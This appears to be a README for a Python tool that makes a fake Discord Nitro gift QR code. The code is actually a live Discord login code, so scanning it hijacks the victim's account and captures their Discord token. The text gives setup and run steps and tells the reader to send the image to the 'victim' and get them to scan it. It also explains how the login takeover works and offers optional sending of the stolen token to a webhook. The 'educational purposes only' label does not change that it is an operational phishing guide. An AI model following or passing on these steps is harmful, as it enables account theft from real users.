A Python script that automatically generates a Nitro scam QR code and grabs the Discord token when scanned. This tool demonstrates how people can trick others into scanning their Discord login QR Code, and gain access to their account. Use for Educational Purposes only.
-
If you dont have python installed, download python 3.7.6 and make sure you click on the 'ADD TO PATH' option during the installation.
-
Install the required modules >
pip install -r requirements.txt
or double clickpip_install_requirements.bat
also make sure to edit "URL" variable within the program to add your webhook! -
Type
python QR_Generator.py
in cmd to run or double clickrun_script.bat
-
Wait for the
discord_gift.png
to be generated. Send the image to the victim and make them scan it. -
QR Code only lasts about 2 minutes. Make sure you send a fresh one to the victim and he is ready to scan.
-
When the QR Code is scanned, you will automatically be logged in to their account and the script will grab the Discord token.
Make sure your chromedriver.exe file is the same version as your current Chrome web browser version. To check your current Chrome version,
paste chrome://settings/help
in Google Chrome.
if Chrome crashes,
- Make sure your chromedriver.exe file is the same version as your Chrome web browser version
- Download the latest version chromedriver.exe here: https://chromedriver.chromium.org/downloads
- Then replace the chromedriver.exe file in the folder.
- The python script opens a window into https://discord.com/login
- The script converts the QR code on the website and downloads the image (contain a one time link that will allow login to a specfic request, from a specific browser, from a specfic IP address to log in), (The browser information, IP address, is not exposed in the QR code) - Correct me if I'm wrong
- The script combines the QR code with the template
- When the target scan the QR code logging in Discord will send data authenticating the browser in the QR which is the QR code in the template
- The browser is refreshed on sucessful login and the token is extracted from the login the script detects this and logs it.
- Done pretty much
- (Optional) Sends it of the webhook of your choice